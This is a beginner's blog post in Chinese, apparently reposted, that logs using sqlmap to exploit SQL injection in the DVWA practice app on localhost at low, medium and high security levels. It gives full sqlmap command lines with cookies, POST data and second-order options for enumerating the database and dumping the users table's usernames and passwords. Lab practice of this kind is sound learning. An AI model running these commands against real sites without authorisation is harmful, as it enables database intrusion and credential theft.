sqlmap注入dvwa


第一次寫博客,目前自己處於一個新手狀態,寫一下博客來記錄一下學習

今天要記錄的是用sqlmap來注入dvwa里的sql注入模塊

先從low等級開始

 

 

 

用sqlmap進行爆破:sqlmap -u "url"

 

 

 從得到的結果中能看到我們是需要cookie的,然后去dvwa看一下cookie

 

 

 然后在命令中加入cookie:sqlmap -u "url" --cookie="security=low,PHPSESSID=mtfmtpa2rhgnr887auaudgsm00"

查看數據庫,在后面加上 --dbs就行了

 

 

 就得到服務器上所有的數據庫,然后簡單的分析一下或者窮舉就能找到我們要爆破的數據庫

然后爆破表:sqlmap -u "url" --cookie="..." -D dvwa --tables

 

 

 得到數據表

接下來就是爆破列:sqlmap -u "url" --cookie="..." -D dvwa -T users --columns

 

 

 然后再爆破字段:sqlmap -u "url" --cookie="..." -D dvwa -T users -C user,password --dump

 

 然后就得到了所有的用戶名和密碼

 

然后是medium

這里的傳輸方式改成了post所以url中沒有參數,我們用burpsuite抓包看一下參數

 

 由於是post傳輸,所以這里要用--data把數據引入過來:sqlmap -u "url" --data="id=1&Submit=Submit(注意大小寫)" --cookie="security=medium;PHPSESSID=...." --dbs

然后接下來的步驟就和上面的一樣了:sqlmap -u "url" --data="id=1&Submit=Submit(注意大小寫)" --cookie="security=medium;PHPSESSID=...." -D dvwa -T users -C user,password --dump

然后是high等級

 

 high等級這里是一個鏈接點擊過后會跳轉到另一個頁面,這個如果用sqlmap進行爆破就要設計到二階sql注入:有些時候注入點輸入的數據看返回結果的時候並不是當前的頁面,而是另外的一個頁面,這時候就需要你指定到哪個頁面獲取響應判斷真假。-–second-order后面跟一個判斷頁面的URL地址。

首先還是用burpsuite進行抓包查看參數可以發現是與medium是類似的:sqlmap -u "http://localhost/dvwa/vulnerabilities/sqli/session-input.php" --data="id=2&Submit=Submit" --cookie="security=high; PHPSESSID=sn535dq4ec4kv2hi50oeltrua9" --second-url "http://localhost/dvwa/vulnerabilities/sqli/" --dbs

然后再與上面的步驟一樣就可以了:sqlmap -u "http://localhost/dvwa/vulnerabilities/sqli/session-input.php" --data="id=2&Submit=Submit" --cookie="security=high; PHPSESSID=sn535dq4ec4kv2hi50oeltrua9" --second-url "http://localhost/dvwa/vulnerabilities/sqli/" -D dvwa -T users -C user,password --dump

  

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM